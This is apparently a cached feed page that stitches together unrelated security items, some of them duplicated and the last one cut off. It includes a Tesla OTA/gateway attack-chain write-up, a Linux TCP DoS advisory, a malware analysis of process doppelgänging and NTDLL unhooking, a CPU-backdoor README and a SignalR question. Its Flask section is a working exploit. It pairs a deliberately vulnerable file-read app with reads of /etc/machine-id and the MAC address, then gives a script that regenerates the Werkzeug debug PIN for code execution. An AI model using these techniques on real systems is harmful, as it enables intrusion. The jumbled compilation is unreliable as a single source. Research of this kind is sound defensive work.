用这种方法刷入我们修改后的升级软件后重启网关使其执行升级软件,即可在网关上执行我们修改后的升级代码植入后门,或绕过原有升级软件对固件签名的检查。此外,我们还对整个OTA升级过程进行了研究。特斯拉的OTA升级过程大致可由下图所示的几个关键步骤描述。

OTA过程云端通过特斯拉自有的握手协议下发固件下载地址后,特斯拉CID上的cid-updater会从云端下载固件,进行解密,并校验其完整性。之后通过类似于A/B Update的方式,车内其他强运算力的联网组件(如IC、APE等)根据cid-updater提供的固件文件进行升级。

固件升级

此外,cid-updater还会负责根据固件包中的目录信息与车辆配置做比照,据此产生release.tgz文件,并和上文提到过的升级软件boot.img一同提供给网关。然后网关执行上述升级软件,更新在网关上连接的二十余个ECU。

为了展示我们对车电系统整体的理解,我们对特斯拉在2016年年末推出的彩蛋功能进行了自定义修改和展示。

下图是彩蛋过程中几个重点参与活动的ECU:

ECU信息

首先,CID会发送启动信号,触发这一过程,信号会被发送至BCCEN,该控制器对相关硬件进行初始化操作后,会确认目前车辆是否准备好启动彩蛋,并等待钥匙的按键信号。按键后,CID开始播放音乐,同时BCCEN以及其他ECU会按照各ECU中存储的动作表,控制各组件按照预定计划动作。

因此为了实现自定义彩蛋功能,我们在CID中动态修改了多个检查点,并对ECU固件中的动作表进行了修改,将修改后的固件刷入了ECU中。

刷入CID最后,作为对前沿技术的一个尝试,我们研究了ape-updater中的安全漏洞。该程序作为特斯拉OTA框架中的一部分,负责整个APE系统的更新。

ape-updater中的安全漏洞

该程序提供了两个业务端口:

25974端口提供了一个交互式shell和多种命令,可供CID进行控制;

28496端口可通过一个HTTP服务器提供其他组件需要的文件。

端口信息在25974端口提供的handshake命令中,会从服务器请求一个JSON字符串,并稍后提供给install命令解析。

在某个特定版本的特斯拉APE固件中,我们发现了名为m3-factory-deploy的命令,该命令可覆盖handshake返回的JSON,从而让攻击者提供的JSON被解析。

m3-factory-deplo命令

利用JSON中存在的self_serve键值,可以要求APE将/var/etc/saccess/tesla1这一文件暴露在HTTP服务器下,从而可得到其内容。

利用其为凭据,可通过25974端口得到ape-updater中自带的命令执行权限,可以重新开启SSH,并以root权限在APE上执行任意程序。

image.png

特斯拉的反馈

在上述所有漏洞报告给特斯拉后,特斯拉迅速做出了反应,措施包括:

修复Webkit漏洞;

与英伟达共同修复NVMap中的内核漏洞;

修复Gateway中的漏洞。

团队还注意到特斯拉在其系统安全性上不断地进行改善与提高,比如:

更严格的iptables限制;

对OTA框架中的几个关键程序进行进一步加固;

降低saccess文件夹中token的权限;

禁止系统降级;

……

这一过程中,特斯拉专业的安全响应团队和他们的OTA机制起到了关键的作用,防止了车主受到进一步的威胁。

演讲现场照片

image.png由于篇幅所限,对相关漏洞我们只介绍了类型和核心原理,对这个研究感兴趣的朋友可以查看我们发布的白皮书《穿云拨雾:对特斯拉汽车网关、车身控制模块以及辅助驾驶(Autopilot)ECU的渗透测试》获取更多信息。

关注“腾讯科恩实验室”公众号,回复“车联网安全”即可获取Black Hat 2018议题白皮书!

*本文作者:腾讯安全科恩实验室,转载请注明来自FreeBuf.COM


          CVE-2018-5390:Linux内核TCP中发现远程拒绝服务漏洞      Cache   Translate Page   Web Page Cache   

报告编号: B6-2018-081001

报告来源: 360CERT

报告作者: 360CERT

更新日期: 2018-08-10

0x00 漏洞描述

在Linux内核版本4.9+中,攻击者通过构造恶意数据包,使得内核在执行 tcp_collapse_ofo_queue() 和 tcp_prune_ofo_queue() 函数时,让CPU使用率达到饱和状态,从而造成拒绝服务攻击。攻击者为了维持拒绝服务攻击需要连续的双向TCP会话到可达的开放端口,因此无法使用欺骗的IP地址执行攻击。

360-CERT团队经过评估,认为漏洞风险等级高危,建议用户参照相关修复建议进行防御。

0x01 受影响的厂商

  • Red Hat, Inc.
  • Debian GNU/Linux
  • Ubuntu
  • FreeBSD Project

更多

0x02 安全建议

1.查看相应厂商是否发布相关补丁,如有则及时更新

2.自己手工进行修复(参考链接3)

3.查看系统CPU使用率是否过高,且接受到大量异常数据,如有,则在防火墙上屏蔽相应IP。

0x03 时间线

2018-07-15 由国外安全研究人员Juha-Matti Tilli发现并报告

2018-08-10 360-CERT发布预警

0x04 参考链接

  1. https://www.kb.cert.org/vuls/id/962459

  2. https://nvd.nist.gov/vuln/detail/CVE-2018-5390

  3. https://git.kernel.org/pub/scm/linux/kernel/git/davem/net.git/commit/?id=1a4f14bab1868b443f0dd3c55b689a478f82e72e

  4. https://paper.seebug.org/659/

  5. https://0day.city/cve-2018-5390.html


          Flask debug pin安全问题      Cache   Translate Page   Web Page Cache   

之前在国赛决赛的时候看到p0师傅提到的关于Flask debug模式下,配合任意文件读取,造成的任意代码执行。那时候就很感兴趣,无奈后来事情有点多,一直没来得及研究。今天把这个终于把这个问题复现了一下

主要就是利用Flask在debug模式下会生成一个Debugger PIN

kingkk@ubuntu:~/Code/flask$ python3 app.py 
 * Running on http://0.0.0.0:8080/ (Press CTRL+C to quit)
 * Restarting with stat
 * Debugger is active!
 * Debugger pin code: 169-851-075

通过这个pin码,我们可以在报错页面执行任意python代码

image

问题就出在了这个pin码的生成机制上,在同一台机子上多次启动同一个Flask应用时,会发现这个pin码是固定的。是由一些固定的值生成的,不如直接来看看Flask源码中是怎么写的

测试环境为:

  • Ubuntu 16.04
  • python 3.5
  • Flask 0.10.1

一个简单的hello world程序 app.py

# -*- coding: utf-8 -*-
from flask import Flask
app = Flask(__name__)

@app.route("/")
def hello():
    return 'hello world!'

if __name__ == "__main__":
    app.run(host="0.0.0.0", port=8080, debug=True)

用pycharm在app.run下好断点,开启debug模式

由于代码写的还是相当官方的,很容易就能找到生成pin码的部分,大致跟踪流程如下

app.py 
python3.5/site-packages/flask/app.py  772行左右 run_simple(host, port, self, **options)
python3.5/site-packages/werkzeug/serving.py 751行左右 application = DebuggedApplication(application, use_evalex)
python3.5/site-packages/werkzeug/debug/__init__.py

主要就在这个debug/__init__.py中,先来看一下_get_pin函数

def _get_pin(self):
    if not hasattr(self, '_pin'):
        self._pin, self._pin_cookie = get_pin_and_cookie_name(self.app)
    return self._pin

跟进一下get_pin_and_cookie_name函数

def get_pin_and_cookie_name(app):
    """Given an application object this returns a semi-stable 9 digit pin
    code and a random key.  The hope is that this is stable between
    restarts to not make debugging particularly frustrating.  If the pin
    was forcefully disabled this returns `None`.

    Second item in the resulting tuple is the cookie name for remembering.
    """
    pin = os.environ.get('WERKZEUG_DEBUG_PIN')
    rv = None
    num = None

    # Pin was explicitly disabled
    if pin == 'off':
        return None, None

    # Pin was provided explicitly
    if pin is not None and pin.replace('-', '').isdigit():
        # If there are separators in the pin, return it directly
        if '-' in pin:
            rv = pin
        else:
            num = pin

    modname = getattr(app, '__module__',
                      getattr(app.__class__, '__module__'))

    try:
        # `getpass.getuser()` imports the `pwd` module,
        # which does not exist in the Google App Engine sandbox.
        username = getpass.getuser()
    except ImportError:
        username = None

    mod = sys.modules.get(modname)

    # This information only exists to make the cookie unique on the
    # computer, not as a security feature.
    probably_public_bits = [
        username,
        modname,
        getattr(app, '__name__', getattr(app.__class__, '__name__')),
        getattr(mod, '__file__', None),
    ]

    # This information is here to make it harder for an attacker to
    # guess the cookie name.  They are unlikely to be contained anywhere
    # within the unauthenticated debug page.
    private_bits = [
        str(uuid.getnode()),
        get_machine_id(),
    ]

    h = hashlib.md5()
    for bit in chain(probably_public_bits, private_bits):
        if not bit:
            continue
        if isinstance(bit, text_type):
            bit = bit.encode('utf-8')
        h.update(bit)
    h.update(b'cookiesalt')

    cookie_name = '__wzd' + h.hexdigest()[:20]

    # If we need to generate a pin we salt it a bit more so that we don't
    # end up with the same value and generate out 9 digits
    if num is None:
        h.update(b'pinsalt')
        num = ('%09d' % int(h.hexdigest(), 16))[:9]

    # Format the pincode in groups of digits for easier remembering if
    # we don't have a result yet.
    if rv is None:
        for group_size in 5, 4, 3:
            if len(num) % group_size == 0:
                rv = '-'.join(num[x:x + group_size].rjust(group_size, '0')
                              for x in range(0, len(num), group_size))
                break
        else:
            rv = num

    return rv, cookie_name

return的rv变量就是生成的pin码

最主要的就是这一段哈希部分

for bit in chain(probably_public_bits, private_bits):
    if not bit:
        continue
    if isinstance(bit, text_type):
        bit = bit.encode('utf-8')
    h.update(bit)
h.update(b'cookiesalt')

连接了两个列表,然后循环里面的值做哈希

这两个列表的定义

probably_public_bits = [
        username,
        modname,
        getattr(app, '__name__', getattr(app.__class__, '__name__')),
        getattr(mod, '__file__', None),
    ]

    private_bits = [
        str(uuid.getnode()),
        get_machine_id(),
    ]

可以先看一下debug的值,配合debug中的值做进一步分析

image

可以看到

username就是启动这个Flask的用户

modname为flask.app

getattr(app, '__name__', getattr(app.__class__, '__name__'))为Flask

getattr(mod, '__file__', None)为flask目录下的一个app.py的绝对路径

uuid.getnode()就是当前电脑的MAC地址,str(uuid.getnode())则是mac地址的十进制表达式

get_machine_id()不妨跟进去看一下

def _generate():
        # Potential sources of secret information on linux.  The machine-id
        # is stable across boots, the boot id is not
        for filename in '/etc/machine-id', '/proc/sys/kernel/random/boot_id':
            try:
                with open(filename, 'rb') as f:
                    return f.readline().strip()
            except IOError:
                continue

        # On OS X we can use the computer's serial number assuming that
        # ioreg exists and can spit out that information.
        try:
            # Also catch import errors: subprocess may not be available, e.g.
            # Google App Engine
            # See https://github.com/pallets/werkzeug/issues/925
            from subprocess import Popen, PIPE
            dump = Popen(['ioreg', '-c', 'IOPlatformExpertDevice', '-d', '2'],
                         stdout=PIPE).communicate()[0]
            match = re.search(b'"serial-number" = <([^>]+)', dump)
            if match is not None:
                return match.group(1)
        except (OSError, ImportError):
            pass

        # On Windows we can use winreg to get the machine guid
        wr = None
        try:
            import winreg as wr
        except ImportError:
            try:
                import _winreg as wr
            except ImportError:
                pass
        if wr is not None:
            try:
                with wr.OpenKey(wr.HKEY_LOCAL_MACHINE,
                                'SOFTWARE\\Microsoft\\Cryptography', 0,
                                wr.KEY_READ | wr.KEY_WOW64_64KEY) as rk:
                    machineGuid, wrType = wr.QueryValueEx(rk, 'MachineGuid')
                    if (wrType == wr.REG_SZ):
                        return machineGuid.encode('utf-8')
                    else:
                        return machineGuid
            except WindowsError:
                pass

    _machine_id = rv = _generate()
    return rv

首先尝试读取/etc/machine-id或者 /proc/sys/kernel/random/boot_i中的值,若有就直接返回

假如是在win平台下读取不到上面两个文件,就去获取注册表中SOFTWARE\\Microsoft\\Cryptography的值,并返回

这里就是etc/machine-id文件下的值

image

这样,当这6个值我们可以获取到时,就可以推算出生成的PIN码,引发任意代码执行

修改一下之前的app.py,增加一个任意文件读取功能,并让index页面抛出一个异常(也就是给一个代码执行点

# -*- coding: utf-8 -*-
import pdb
from flask import Flask, request
app = Flask(__name__)

@app.route("/")
def hello():
    return Hello['a']

@app.route("/file")
def file():
    filename = request.args.get('filename')
    try:
        with open(filename, 'r') as f:
            return f.read()
    except:
        return 'error'

if __name__ == "__main__":
    app.run(host="0.0.0.0", port=8080, debug=True)

尝试去获取那6个变量值

username # 用户名

modname # flask.app

getattr(app, '__name__', getattr(app.__class__, '__name__')) # Flask

getattr(mod, '__file__', None) # flask目录下的一个app.py的绝对路径

uuid.getnode() # mac地址十进制

get_machine_id() # /etc/machine-id

首先先获取/etc/machine-id
image

19949f18ce36422da1402b3e3fe53008

然后是mac地址(我虚拟机中网卡为ens33,一般情况下应该是eth0)

image

然后还可以利用debug的报错页面获取一些路径信息

image

这样直接用户名和app.py的绝对路径都能获得到了

然后利用几个值,就可以推算出pin码

import hashlib
from itertools import chain
probably_public_bits = [
    'kingkk',# username
    'flask.app',# modname
    'Flask',# getattr(app, '__name__', getattr(app.__class__, '__name__'))
    '/home/kingkk/.local/lib/python3.5/site-packages/flask/app.py' # getattr(mod, '__file__', None),
]

private_bits = [
    '52242498922',# str(uuid.getnode()),  /sys/class/net/ens33/address
    '19949f18ce36422da1402b3e3fe53008'# get_machine_id(), /etc/machine-id
]

h = hashlib.md5()
for bit in chain(probably_public_bits, private_bits):
    if not bit:
        continue
    if isinstance(bit, str):
        bit = bit.encode('utf-8')
    h.update(bit)
h.update(b'cookiesalt')

cookie_name = '__wzd' + h.hexdigest()[:20]

num = None
if num is None:
    h.update(b'pinsalt')
    num = ('%09d' % int(h.hexdigest(), 16))[:9]

rv =None
if rv is None:
    for group_size in 5, 4, 3:
        if len(num) % group_size == 0:
            rv = '-'.join(num[x:x + group_size].rjust(group_size, '0')
                          for x in range(0, len(num), group_size))
            break
    else:
        rv = num

print(rv)

算出来pin码为

169-851-075

可以看到和终端输出的pin码值是一样的

kingkk@ubuntu:~/Code/flask$ python3 app.py 
 * Running on http://0.0.0.0:8080/ (Press CTRL+C to quit)
 * Restarting with stat
 * Debugger is active!
 * Debugger pin code: 169-851-075

尝试在debug页面输入一下

成功命令执行

image


          腾讯科恩实验室Black Hat USA 2018议题解读       Cache   Translate Page   Web Page Cache   

背景介绍

OTA(Over-The-Air)是汽车行业智能网联变革的核心能力之一。本次Black Hat USA 2018上,腾讯科恩实验室带来了2017年对特斯拉具备的先进OTA功能相关的安全研究成果。本成果对于促进汽车行业安全稳定落地智能网联化具有重大积极作用,同时本次议题也是全球首次涉及对汽车先进驾驶辅助系统(ADAS,特斯拉相关系统名为:Autopolit)的信息安全研究成果披露。更多详细信息请关注腾讯科恩实验室官方微信号:KeenSecurityLab,并回复“车联网安全”即可获得此次研究技术细节白皮书。

image

议题概要

腾讯安全科恩实验室在2016年和2017年,在避免物理接触汽车的远程攻击场景下,连续两年针对特斯拉Model S和Model X进行了攻击测试。在去年举办的Black Hat USA大会上,科恩实验室的研究人员介绍了2016年特斯拉公司对其研究成果的致谢中所包含的具体细节,并向与会者展示了一系列Tesla汽车的安全漏洞,获得了与会者的好评。此外,借助灯光舞蹈秀的形式展示了利用2017年发现的另一批漏洞攻击的威力,但相关漏洞的细节并未公布。今年,该议题将会进一步介绍2017年彩蛋视频背后涉及到的技术细节。除了介绍特斯拉的由云端主导的空中升级(OTA)机制,并展示一些攻击链中开发的新技术外,该议题还将着重介绍测试过程中发现的多个严重的安全漏洞。

image
 

作者简介

刘令,腾讯科恩实验室研究员,专注于逆向工程、漏洞挖掘、漏洞研究等技术,多次参与特斯拉等汽车的安全研究。曾在QEMU和XEN中发现多个虚拟化漏洞,同时也是一名CTF爱好者。

image

张文凯,腾讯科恩实验室研究员,多次参与特斯拉、宝马等汽车安全研究项目,主要负责汽车CAN网络和汽车固件分析工作,有丰富的嵌入式系统软件开发经验,熟悉ECU设计过程和汽车CAN网络结构。

image

杜岳峰,腾讯科恩实验室研究员,多次参与特斯拉汽车安全研究,对逆向工程和恶意软件分析领域有着浓厚的兴趣。

image

议题解析

在今年的Black Hat USA大会上,我们向大家介绍2017年的攻击链中相关漏洞的细节,并分享使用这些漏洞是如何完成灯光秀的。此外,自动驾驶系统的安全性已经成为一个新的热点话题,我们则会向大家展示在特斯拉车上,对辅助驾驶模块(即Autopillot,也称APE)的安全研究成果。最后,和以往一样,我们将会介绍特斯拉对相关漏洞的修复结果,并再一次强调只有安全研究者、安全社区和设备厂商互相合作,才能有效的提高整体安全水平。

image

攻击过程中涉及到的部分硬件单元和连接方式如下图所示。在去年,我们利用了两个Webkit中存在的漏洞,实现了浏览器中的任意代码执行。今年的情况和去年类似,整个攻击过程依然是从一个Webkit漏洞开始的。

CID上具有一个Webkit内核的浏览器,在漏洞报告时,该浏览器仍保持为534.34版。该版本的Webkit内核中,存在一个UAF漏洞,下图即是该漏洞的PoC代码:

image

这个漏洞存在于对SVGTransformList元素的操作过程中。该元素内部存在多个SVGTransform实例,这些实例的SVGMatrix结构会存储在一个Vector里。当SVGTransformList的Initialize或clear方法被调用后,Vecotr被释放,但访问Vector中Matrix的指针仍然存留。利用该UAF漏洞,经过精心的内存布局之后,即可借助ArrayStorage、Uint32Array等结构的特性实现对内存的任意读和任意写,并从而实现了浏览器中的代码执行。

image

获取了浏览器的权限之后,下一步操作就是突破内核和其他安全防护措施对浏览器的限制,从而得到root shell。2016年,我们是通过利用Linux内核中的一个漏洞实现该目的的,但在2017年,由于特斯拉修复了相当多的内核漏洞,我们不得不寻找新的漏洞。

在2017年的车机固件中,浏览器进程只能访问/dev/nvmap和/dev/nvhost-ctrl两个文件,这两个文件都是用来与英伟达Tegra芯片进行通信的驱动接口。在和这两个接口相关的代码中,我们发现了一处漏洞,该漏洞可使我们从用户空间对内核空间的任意内存地址减1。

image

这一漏洞存在于NVMap驱动中,当处理命令NVMAP_IOC_PIN_MULT时,由于对用户提供的指针数组验证不当,当其中包含一个非法结构时,非法结构体的引用数会被减1,而这个引用数的指针是用户态可控的。这意味着,用户态可以对内核态的任意内存地址减1。利用这一漏洞,结合Kernel中的其他gadget,我们可以对内核空间中的任意地址进行读写操作。之后对相关的syscall和AppArmor配置进行篡改,即可拥有root shell。

image

得到root shell证明CID已被完全攻破,下一个目标则是网关。2016年我们报告了网关上的一些设计缺陷,特斯拉在收到报告后对相关漏洞进行了修复,通过加入签名机制,对网关上的升级软件传输操作进行了限制,未签名的升级软件将不能被传输到网关上,因此理论上使用非物理攻击方法是无法传输篡改后的升级软件的。

但在对新软件进行安全审计的过程中,我们发现,升级过程中存在行为不一致的问题。如下图所示,尽管网关的文件传输协议限制了直接传输升级软件的操作,名为”boot.img”的升级软件无法直接传输到网关上,但文件系统的重命名行为和文件传输协议的重命名行为不一致。文件系统会忽略目标文件名首部的空格,导致目标文件名“\x20boot.img”会被文件系统理解为”boot.img”,从而绕过了升级软件对文件名的检查。

image

用这种方法刷入我们修改后的升级软件后,重启网关,使其执行升级软件,即可在网关上执行我们修改后的升级代码,植入后门,或绕过原有升级软件对固件签名的检查。

此外,我们还对整个OTA升级过程进行了研究。特斯拉的OTA升级过程大致可由下图所示的几个关键步骤描述。

云端通过特斯拉自有的握手协议下发固件下载地址后,特斯拉CID上的cid-updater会从云端下载固件,进行解密,并校验其完整性。之后通过类似于A/B Update的方式,车内其他强运算力的联网组件(如IC、APE等)根据cid-updater提供的固件文件进行升级。

此外,cid-updater还会负责根据固件包中的目录信息,与车辆配置做比照,据此产生release.tgz文件,并和上文提到过的升级软件boot.img一同提供给网关,网关执行上述升级软件,更新在网关上连接的二十余个ECU。

为了展示我们对车电系统整体的理解,我们对特斯拉在2016年年末推出的彩蛋功能进行了自定义修改和展示。下图是彩蛋过程中几个重点参与活动的ECU:

image

首先,CID会发送启动信号,触发这一过程,信号会被发送至BCCEN,该控制器对相关硬件进行初始化操作后,会确认目前车辆是否准备好启动彩蛋,并等待钥匙的按键信号。按键后,CID开始播放音乐,同时BCCEN以及其他ECU会按照各ECU中存储的动作表,控制各组件按照预定计划动作。

因此为了实现自定义彩蛋功能,我们在CID中动态修改了多个检查点,并对ECU固件中的动作表进行了修改,将修改后的固件刷入了ECU中。

image

最后,作为对前沿技术的一个尝试,我们研究了ape-updater中的安全漏洞。该程序作为特斯拉OTA框架中的一部分,负责整个APE系统的更新。

image

该程序提供了两个业务端口,其中25974端口提供了一个交互式shell和多种命令,可供CID进行控制;28496端口可通过一个HTTP服务器提供其他组件需要的文件。

image

在25974端口提供的handshake命令中,会从服务器请求一个JSON字符串,并稍后提供给install命令解析。在某个特定版本的特斯拉APE固件中,我们发现了名为m3-factory-deploy的命令,该命令可覆盖handshake返回的JSON,从而让攻击者提供的JSON被解析。

image

利用JSON中存在的self_serve键值,可以要求APE将/var/etc/saccess/tesla1这一文件暴露在HTTP服务器下,从而可得到其内容。利用其为凭据,可通过25974端口得到ape-updater中自带的命令执行权限,可以重新开启SSH,并以root权限在APE上执行任意程序。

image

在上述所有漏洞报告给特斯拉后,特斯拉做出了及时的反应,其中包括:

  • 修复Webkit漏洞
  • 与英伟达共同修复NVMap中的内核漏洞
  • 修复Gateway中的漏洞

我们还注意到特斯拉在其系统安全性上不断地进行改善与提高,比如:

  • 更严格的iptables限制
  • 对OTA框架中的几个关键程序进行进一步加固
  • 降低saccess文件夹中token的权限
  • 禁止系统降级
  • ……

我们认为在这一过程中,特斯拉专业的安全响应团队和他们的OTA机制起到了关键的作用,防止了车主受到进一步的威胁。

image

image

由于篇幅所限,对相关漏洞我们只介绍了类型和核心原理,对我们的研究感兴趣的朋友可以查看我们发布的白皮书《穿云拨雾:对特斯拉汽车网关、车身控制模块以及辅助驾驶(Autopilot)ECU的渗透测试》获取更多信息。


          FLATPAK ?      Cache   Translate Page   Web Page Cache   
The new Linux Mint 18.3 & 19.0 have FLATPAK. Some developers have fully embraced FLATPAK and that irritates me, that & the new 4.15 kernel. It is bad enough installing programs. You either use the...
          Five-run 5th too much for Clinton to overcome      Cache   Translate Page   Web Page Cache   
Clinton, IA - A Eugene Helder home run was not enough for the Clinton LumberKings who fell to the Cedar Rapids Kernels 9-4 on Thursday night at Ashfor... - MWL Clinton LumberKings
          Osiris dropper found using process doppelgnging      Cache   Translate Page   Web Page Cache   

Process doppelgnging , a new technique of impersonating a process, was published last year at Black Hat conference . After some time, a ransomware named SynAck was discovered that adopted this process for malicious purposes. However, this technique is still pretty rare in wild. So, it was an interesting surprise to notice it in a dropper of the Osiris banking Trojan (a new version of the infamous Kronos).

The authors of this dropper were skilled, and they added several other tricks to spice the whole thing up. In this post, we will have a closer look at the loader’s implementation.

Analyzed sample 5e6764534b3a1e4d3abacc4810b6985d original sample (stage 1) 8d58c731f61afe74e9f450cc1c7987be stage 2 e8c39091cce419adee23153f30cefa5a Osiris core bot

Osiris is loaded in three steps:


Osiris dropper found using process doppelgnging
Overview

The dropper creates a new process and injects the content inside:


Osiris dropper found using process doppelgnging

Interestingly, when we look into the modules loaded in the process space of the injector, we can see an additional copy of NTDLL:


Osiris dropper found using process doppelgnging

This is a well-known technique that some malware authors use in order to evade monitoring applications and hide the API calls that they used.

When we examine closely what the functions are called from that additional NTDLL, we find more interesting details. It calls several APIs related to NTFS transactions. This brings to mind the technique of process doppelgnging, which relies on this mechanism.

Loading additional NTDLL

NTDLL is a special, low-level DLL. Basically, it is just a wrapper around syscalls. It does not have any dependencies from other DLLs in the system. Thanks to this, it can be loaded conveniently, without the need to fill its import table.

Other system DLLs, such as Kernel32, rely heavily on functions exported from NTDLL. This is why many user-land monitoring tools hook and intercept the functions exported by NTDLL: to watch what functions are being called and check if the process does not display any suspicious activity.

Of course malware authors know about this, so sometimes, in order to fool this mechanism, they load their own, fresh and unhooked copy of NTDLL from the disk. There are several ways to implement this. Let’s have a look how the authors of the Osiris dropper did it.

Looking at the memory mapping, we see that the NTDLL is loaded as an image, just like other DLLs. However, it was not loaded by a typical LoadLibrary function, nor even by its low-level version from NTDLL, LdrLoadDll. Instead, the authors decided to load the file as a section, using following functions:

ntdll.NtCreateFile to open the ntdll.dll file ntdll.NtCreateSection to create a section out of this file ntdll.ZwMapViewOfSection to map this section into the process address space
Osiris dropper found using process doppelgnging

This was smart move because the DLL looks like it was loaded in a typical way, and yet, if we monitor the LdrLoadDll function, we see nothing suspicious.

Implementation of process doppelgnging

In order to make their injection more stealthy, the authors took the original implementation of process doppelgnging a step further and used only low-level APIs. So, instead of calling the convenient wrappers from Kernel32, for most of the functions they called their equivalents from NTDLL. Moreover, they used a custom copy of this DLL.

First, they created a new suspended process. This is the process into which the payload will be injected. However, in this case, authors decided to use a function from kernel32.dll: CreateProcessInternal.


Osiris dropper found using process doppelgnging

Process doppelgnging then starts from creating a new transaction, within which a new file is created. The original implementation used CreateTransaction and CreateFileTransacted from Kernel32 for this purpose. But this is not the case here.


Osiris dropper found using process doppelgnging

First, a function ZwCreateTransaction from a NTDLL is called. Then, instead of CreateFileTransacted , the authors open the transacted file by RtlSetCurrentTransaction along with ZwCreateFile (the created file is %TEMP%\Liebert.bmp). Then, the dropper writes the content of the new executable to the file―the second stage of the malware. Analogically, RtlSetCurrentTransaction with ZwWriteFile is used.


Osiris dropper found using process doppelgnging

We can see that the buffer that is being written contains the new PE file: the second stage payload. Typically, for the process doppelgnging technique, the file is visible only within the transaction and cannot be opened by other processes, such as AV scanners.


Osiris dropper found using process doppelgnging

After the file inside the transaction is created, it will be used to create a buffer in special format, called a section. The function that can do it is available only via low-level API: ZwCreateSection/NtCreateSection.


Osiris dropper found using process doppelgnging

After the section is created, the file that was created is no longer needed. The transaction gets rolled back (by ZwRollbackTransaction), and the changes to the file are never saved on the disk.

Further, the created section will be used to load a PE file. After writing the payload into memory and setting the necessary patches, such as EP redirection, the process is resumed:


Osiris dropper found using process doppelgnging
Second stage loader

The next layer ( 8d58c731f61afe74e9f450cc1c7987be ) is not the core yet, but the next stage of the loader. The way it loads the final payload is much simpler, yet still not trivial. The code of Osiris is unpacked piece by piece and manually loaded along with its dependencies into a newly allocated memory area within the loader process.


Osiris dropper found using process doppelgnging

After this self-injection, the loader jumps into the payload’s entry point:


Osiris dropper found using process doppelgnging
The interesting thing is that the entry poi
          Christopher Domas: Hardware Backdoors in X86 CPUs      Cache   Translate Page   Web Page Cache   
project:rosenbridge

: hardware backdoors in x86 CPUs

github.com/xoreaxeaxeax/rosenbridge // domas // @xoreaxeaxeax


Christopher Domas: Hardware Backdoors in X86 CPUs
Overview

project:rosenbridge reveals a hardware backdoor in some desktop, laptop, and embedded x86 processors.

The backdoor allows ring 3 (userland) code to circumvent processor protections to freely read and write ring 0 (kernel) data. While the backdoor is typically disabled (requiring ring 0 execution to enable it), we have found that it is enabled by default on some systems.

This repository contains utilities to check if your processor is affected, close the backdoor if it is present, and the research and tools used to discover and analyze the backdoor.

The Backdoor

The rosenbridge backdoor is a small, non-x86 core embedded alongside the main x86 core in the CPU. It is enabled by a model-specific-register control bit, and then toggled with a launch-instruction . The embedded core is then fed commands, wrapped in a specially formatted x86 instruction. The core executes these commands (which we call the 'deeply embedded instruction set'), bypassing all memory protections and privilege checks.

While the backdoor should require kernel level access to activate, it has been observed to be enabled by default on some systems, allowing any unprivileged code to modify the kernel.

The rosenbridge backdoor is entirely distinct from other publicly known coprocessors on x86 CPUs, such as the Management Engine or Platform Security Processor; it is more deeply embedded than any known coprocessor, having access to not only all of the CPU's memory, but its register file and execution pipeline as well.

Affected Systems

It is thought that only VIA C3 CPUs are affected by this issue. The C-series processors are marketed towards industrial automation, point-of-sale, ATM, and healthcare hardware, as well as a variety of consumer desktop and laptop computers.

Looking Forward

The scope of this vulnerability is limited; generations of CPUs after the C3 no longer contain this feature.

This work is released as a case study and thought experiment, illustrating how backdoors might arise in increasingly complex processors, and how researchers and end-users might identify such features. The tools and research offered here provide the starting point for ever-deeper processor vulnerability research.

Checking your CPU

To check if your CPU is affected:

git clone https://github.com/xoreaxeaxeax/rosenbridge cd rosenbridge/util make sudo modprobe msr sudo ./bin/check

The provided utility must be run on baremetal (not in a virtual-machine), and is in an alpha state. It may crash, panic, or hang systems not containing the backdoor.

The utilities provided here are designed around a specific processor family and core; unfortunately, the tools will miss the backdoor if it has been even slightly modified from the researched form.

Closing the Backdoor

Some systems have the backdoor enabled by default, allowing unprivileged code to gain kernel level access without permission. If the steps in 'Checking your CPU' indicate that your CPU is vulnerable, you can install a script to close the backdoor early in the boot process:

cd fix make sudo make install reboot

Note that, even with this, an attacker with kernel level access can still re-enable the backdoor. This script is provided as an outline for correcting the issue during the boot process, but will require adaptation for different systems.

Tools and Techniques

The sandsifter utility is used extensively in this research for uncovering unknown instructions.

asm

An assembler for the Deeply Embedded Instruction Set (DEIS). It converts programs written in the custom rosenbridge assembly into x86 instructions, which, when executed following the launch-instruction , will send the commands to the hidden CPU core.

esc

A proof-of-concept of using the rosenbridge backdoor for privilege escalation.

fix

A rough outline for closing the vulnerability on affected systems, to the extent possible through model-specific-register updates.

fuzz

A collection of utilities used to fuzz both the x86 and rosenbridge cores, in order to isolate the unknown launch-instruction and bridge-instruction , and resolve the instruction format of the rosenbridge core.

deis

The fuzzer used to explore the effects and capabilities of the hidden CPU core.

exit

It is thought that, on some processors, an exit sequence is needed to switch back to the x86 core at the end of a DEIS sequence. This directory contains the utilities used to search for the exit sequence in early stages of the research, but was abandoned when a processor was found not requiring any such sequence.

manager

A collection of python utilities designed to monitor and manage fuzzing tasks distributed across a network of workers.

wrap

A stripped down version of the sandsifter fuzzer, used to identify the bridge-instruction that will send commands from the x86 core to the hidden rosenbridge core.

kern

A collection of helper utilities used to monitor kernel memory and registers for changes caused by fuzzed DEIS instructions.

lock

Utilities to lock or unlock the rosenbridge backdoor.

proc

A tool to identify patterns from the fuzzing logs to identify classes of DEIS instruction behaviors.

test

A tool used early in the research, to attempt to identify the hidden core's architecture by executing known RISC instructions.

util

An alpha-state tool to detect whether or not a processor is affected by rosenbridge.

References

(TODO: link to whitepaper)

(TODO: link to slides)

Disclaimer

The details and implications presented in this work are the authors’ inferences and opinions, derived from the research described. The research is performed and provided with the goal of identifying and fixing a perceived security vulnerability on the described CPUs. VIA processors are renowned for their low power usage and excellence in embedded designs; we believe that the functionality described was created in good faith as a useful feature for the embedded market, and was unintentionally left enabled on some early generations of the processor. No malicious intent is implied.

Author

project:rosenbridge is a research effort from Christopher Domas ( @xoreaxeaxeax ).


          Throw Exception in my Self-Host program      Cache   Translate Page   Web Page Cache   

Hello, I have a corporate chat service that is currently running for employees and customers.

The number of connections in the last months has multiplied by 5x. The application is steadily following. But yesterday burst the following error below:

NOTE: There were 400 connections at the time of the error

Can you help me? =)

My self-host program:

namespace BQChat.Application.SelfHost
{

class Program
{

    static void Main(string[] args)
    {
        string url = ConfigurationManager.AppSettings["HostDirect"];
        using (WebApp.Start(url))
        {
            Console.WriteLine("Direct Server running on {0}", url);
            Console.ReadLine();
        }            
    }
}

class Startup
{

    public void Configuration(IAppBuilder app)
    {
        
        app.UseCors(CorsOptions.AllowAll);
        var chatProviderService = AutofacConfig.Container.Resolve<IChatProviderService>();
        GlobalHost.DependencyResolver.Register(typeof(AppHub), () => new AppHub(chatProviderService));
